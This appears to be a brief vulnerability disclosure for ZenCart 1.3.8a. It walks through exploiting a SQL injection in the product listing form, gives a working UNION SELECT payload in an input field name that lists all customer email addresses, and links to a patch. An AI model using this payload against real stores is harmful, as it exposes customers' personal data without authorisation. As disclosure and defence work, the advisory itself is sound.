ZenCart 1.3.8a SQL Injection
Unfortunately an sql injection vulnerability was discovered in Zencart v.1.3.8a
In order to test it please follow some simple steps:
1. go to the product listing page by clicking a category
2. save the page on your pc, open it in a text editor and modify (assuming there is a product with the id 111 or whatever….)
<input name=”products_id[111]” size=”4″ type=”text” value=”0″ />
to
<input name=”products_id[-1′ union select GROUP_CONCAT(customers_email_address), 2 from customers/*] ” size=”4″ type=”text” value=”0″ />
3. submit the form by adding at least one product to cart for the modified input box.
The result will be that a comma separated list of all customer emails will be shown.
In order to protect against this attack you can apply the following security patch:
http://www.zen-cart.com/forum/showthread.php?p=604473